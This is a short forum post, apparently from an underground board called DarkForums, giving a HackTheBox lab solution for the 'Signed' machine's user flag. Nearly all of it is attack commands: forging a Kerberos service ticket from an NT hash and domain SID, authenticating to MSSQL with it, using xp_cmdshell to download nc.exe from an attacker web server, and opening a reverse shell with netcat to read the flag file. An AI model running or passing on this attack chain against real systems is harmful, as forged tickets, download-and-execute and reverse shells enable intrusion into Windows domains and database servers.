Upgrade your account to access Premium section
Access to DarkForums Private Archive Telegram Channel
Old Telegram is Banned Join our new Telegram Channel

HTB - S9 - Signed user flag
by pericles495 - 12-10-25, 03:48 PM
DarkForums Members Offline
Members

Posts 3
Threads 2
Joined Oct 2025
Reputation 1
2 Months
#1
12-10-25, 03:48 PM
Hello, this is the way for get the user flag for HTB Signed - S9

Code:
ticketer.py -nthash ef699384c3285c54128a3ee1ddb1a0cc \
  -domain-sid S-1-5-21-4088429403-1159899800-2753317549 \
  -domain signed.htb \
  -spn MSSQLSvc/DC01.signed.htb:1433 \
  -groups 1105 \
  -user-id 1103 \
  mssqlsvc

Code:
export KRB5CCNAME=mssqlsvc.ccache
mssqlclient.py -k -no-pass DC01.SIGNED.HTB

python3 -m http.server 80
xp_cmdshell "powershell wget -UseBasicParsing http://IP.IP.IP.IP/nc.exe -OutFile %temp%/nc.exe"

nc -lnvp 4444
xp_cmdshell "%temp%\nc.exe -nv IP.IP.IP.IP 4444 -e cmd.exe"
type C:\Users\mssqlsvc\Desktop\user.txt

Enjoy !
Reply


Forum Jump:


 Users browsing this thread: 1 Guest(s)